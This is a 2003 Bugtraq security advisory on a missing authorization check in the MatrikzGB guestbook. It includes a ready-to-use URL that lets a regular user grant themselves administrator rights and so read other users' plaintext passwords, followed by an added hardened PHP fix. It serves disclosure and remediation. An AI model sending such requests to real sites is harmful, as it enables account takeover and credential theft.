Security hole in MatrikzGB

From: Stephan S. (mastamorphixx_at_web.de)
Date: 08/16/03

    Date: 16 Aug 2003 01:51:49 -0000
    To: bugtraq@securityfocus.com
    
    

    Security hole in MatrikzGB Guestbook
    15/8/2003
     
    Vulnerable Versions:
    Version 2.0 and prior
    Version 3 (not tested)
     
    Summary:
    MatrikzGB was written by Thomas Hempel for
    www.onsite.org.
    A bug in index.php allows a user with a regular user
    account to give administrator rights to himself.
     
    Details:
    The bug is in the user edit function:
    Every regular user is allowed to change rights or make any
    modifications to existing users.
     if ($new_username != "" && $new_password != "") {
         // This excerpt performs no check of the caller's rights before writing the account.
         create_user($new_username, $new_password, $new_rights, $entry_index);
         echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!"; // "The user has been created!"
     }
     
    Example:
    This is an example of how to give administrator rights to
    yourself.
    http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
     
    Comment:
    Once you have administrator rights, you can look up the
    passwords of all other users; they are in plaintext.
     
    Vendor status:
    Vendor has been contacted.
     
    by Stephan "mastamorphixx" S., member of
    www.lostkey.org
    contact: mastamorphixx@web.de
    irc.euirc.de #lostkey
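
The missing authorization check described under Details and the plaintext passwords noted under Comment, shown in corrected form as an added example; this is not MatrikzGB's code and not from the advisory's author. The `options_ok` function, the in-memory `$users` store and the `user` rights value are assumptions; the parameter names and the `admin` value come from the URL in the advisory.

```php
<?php
// Constructed in-memory user store; the guestbook's real storage is not shown in the advisory.
$users = [
    'admin'       => ['hash' => password_hash('adminpass', PASSWORD_DEFAULT),   'rights' => 'admin'],
    'regularuser' => ['hash' => password_hash('regularpass', PASSWORD_DEFAULT), 'rights' => 'user'],
];

// Hypothetical handler for do=options&action=optionsok (parameter names from the advisory's URL).
function options_ok(array &$users, array $req): string
{
    // Accept only string parameters; anything else is treated as empty.
    $get = fn(string $k): string => is_string($req[$k] ?? null) ? $req[$k] : '';
    $caller = $get('user');
    $target = $get('new_username');
    $newPass = $get('new_password');

    // 1. Authenticate the caller against a stored hash instead of a plaintext password.
    if (!isset($users[$caller]) || !password_verify($get('pass'), $users[$caller]['hash'])) {
        return 'denied: bad credentials';
    }
    if ($target === '' || $newPass === '') {
        return 'denied: missing fields';
    }
    $isAdmin = $users[$caller]['rights'] === 'admin';

    // 2. A non-admin may edit only their own account.
    if (!$isAdmin && $target !== $caller) {
        return 'denied: not your account';
    }
    // 3. Only an admin may assign rights, and only from an allowlist;
    //    for everyone else the client-supplied new_rights is ignored.
    $rights = $users[$target]['rights'] ?? 'user';
    if ($isAdmin && in_array($get('new_rights'), ['user', 'admin'], true)) {
        $rights = $get('new_rights');
    }
    $users[$target] = ['hash' => password_hash($newPass, PASSWORD_DEFAULT), 'rights' => $rights];
    return "ok: $target saved with rights=$rights";
}

// The parameters from the advisory's example request, passed to the hardened handler.
echo options_ok($users, [
    'user' => 'regularuser', 'pass' => 'regularpass',
    'new_username' => 'regularuser', 'new_password' => 'regularpass', 'new_rights' => 'admin',
]), "\n";
```

In a deployed fix the credentials would also move out of the query string, where they end up in server logs and browser history, into a POST body or a server-side session.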
     

